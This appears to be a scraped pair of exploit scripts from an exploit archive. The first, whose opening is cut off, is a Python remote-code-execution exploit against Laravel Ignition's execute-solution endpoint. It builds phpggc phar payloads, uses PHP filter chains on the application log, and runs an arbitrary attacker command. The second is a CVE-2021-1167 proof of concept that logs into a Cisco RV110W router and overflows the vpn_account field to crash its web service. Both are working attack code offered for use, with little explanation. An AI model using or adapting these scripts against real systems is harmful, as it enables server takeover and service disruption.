def convert(url='', viewFile=''):
global data
data['parameters']['viewFile'] = viewFile
resp = requests.post(url=url, json=data, headers=header, verify=False)
if resp.status_code == 200:
return True
return False
def exploited(url='', viewFile=''):
global data
data['parameters']['viewFile'] = viewFile
resp = requests.post(url=url, json=data, headers=header, verify=False)
if resp.status_code == 500 and 'cannot be empty' in resp.text:
m = re.findall(r'\{(.|\n)+\}((.|\n)*)', resp.text)
print()
print(m[0][1])
def generate_payload(command='', padding=0):
if '/' in command:
command = command.replace('/', '\/')
command = command.replace('\'', '\\\'')
os.system(r'''php -d'phar.readonly=0' ./phpggc/phpggc monolog/rce1 system '%s' --phar phar -o php://output | base64 -w0 | sed -E 's/./\0=00/g'> payload.txt'''%(command))
payload = ''
with open('payload.txt', 'r') as fp:
payload = fp.read()
payload = payload.replace('==', '=3D=')
for i in range(padding):
payload += '=00'
os.system('rm -rf payload.txt')
return payload
def main():
if len(sys.argv) < 4:
print('Usage: %s url path-log command\n'%(sys.argv[0]))
print('\tEx: %s http(s)://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log \'id\''%(sys.argv[0]))
exit(1)
if not os.path.isfile('./phpggc/phpggc'):
print('Phpggc not found!')
print('Run command: git clone https://github.com/ambionics/phpggc.git')
os.system('git clone https://github.com/ambionics/phpggc.git')
url = sys.argv[1]
path_log = sys.argv[2]
command = sys.argv[3]
padding = 0
payload = generate_payload(command, padding)
if not payload:
print('Generate payload error!')
exit(1)
if 'http' not in url and 'https' not in url:
url = 'http'+url
else:
url = url+'/_ignition/execute-solution'
print('\nExploit...')
clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log))
create_payload(url, 'AA')
create_payload(url, payload)
while (not convert(url, 'php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=%s'%(path_log))):
clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log))
create_payload(url, 'AA')
padding += 1
payload = generate_payload(command, padding)
create_payload(url, payload)
exploited(url, 'phar://%s'%(path_log))
if __name__ == '__main__':
main()
Cisco RV110W version 1.2.1.7 vpn_account denial of service proof of concept exploit.
22bfead549943dbe0007ce4ce4a7b6f5# Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)
# Date: 2021-01
# Exploit Author: Shizhi He
# Vendor Homepage: https://www.cisco.com/
# Software Link: https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.1.7
# Version: V1.2.1.7
# Tested on: RV110W V1.2.1.7
# CVE : CVE-2021-1167
# References:
# https://github.com/pwnninja/cisco/blob/main/vpn_client_stackoverflow.md
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U
#!/usr/bin/env python2
#####
## Cisco RV110W Remote Stack Overflow.
### Tested on version: V1.2.1.7 (maybe useable on other products and versions)
import os
import sys
import re
import urllib
import urllib2
import getopt
import json
import hashlib
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
###
# Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco
# This PoC will crash the target HTTP/HTTPS service
###
#encrypt password
def enc(s):
l = len(s)
s += "%02d" % l
mod = l + 2
ans = ""
for i in range(64):
tmp = i % mod
ans += s[tmp]
return hashlib.md5(ans).hexdigest()
if __name__ == "__main__":
print "Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco"
IP = sys.argv[1]
PORT = sys.argv[2]
USERNAME = sys.argv[3]
PASSWORD = enc(sys.argv[4])
url = 'https://' + IP + ':' + PORT + '/'
#get session_id by POST login.cgi
req = urllib2.Request(url + "login.cgi")
req.add_header('Origin', url)
req.add_header('Upgrade-Insecure-Requests', 1)
req.add_header('Content-Type', 'application/x-www-form-urlencoded')
req.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req.add_header('Referer', url)
req.add_header('Accept-Encoding', 'gzip, deflate')
req.add_header('Accept-Language', 'en-US,en;q=0.9')
req.add_header('Cookie', 'SessionID=')
data = {"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": "0",
"change_action": "",
"enc": "1",
"user": USERNAME,
"pwd": PASSWORD,
"sel_lang": "EN"
}
r = urllib2.urlopen(req, urllib.urlencode(data))
resp = r.read()
login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
print session_id
#trigger stack overflow through POST vpn_account parameter and cause denial of service
req2 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
req2.add_header('Origin', url)
req2.add_header('Upgrade-Insecure-Requests', 1)
req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
req2.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req2.add_header('Referer', url)
req2.add_header('Accept-Encoding', 'gzip, deflate')
req2.add_header('Accept-Language', 'en-US,en;q=0.9')
req2.add_header('Cookie', 'SessionID=')
poc = "a" * 4096
data_cmd = {
"gui_action": "Apply",
"submit_type": "",
"submit_button": "vpn_client",
"change_action": "",
"pptpd_enable": "0",
"pptpd_localip": "10.0.0.1",
"pptpd_remoteip": "10.0.0.10-14",
"pptpd_account": "",
"vpn_pptpd_account": "1",
"vpn_account": poc,
"change_lan_ip": "0",
"netbios_enable": "0",
"mppe_disable": "0",
"importvpnclient": "",
"browser": "",
"webpage_end": "1",
}
r = urllib2.urlopen(req2, urllib.urlencode(data_cmd))
resp = r.read()
print resp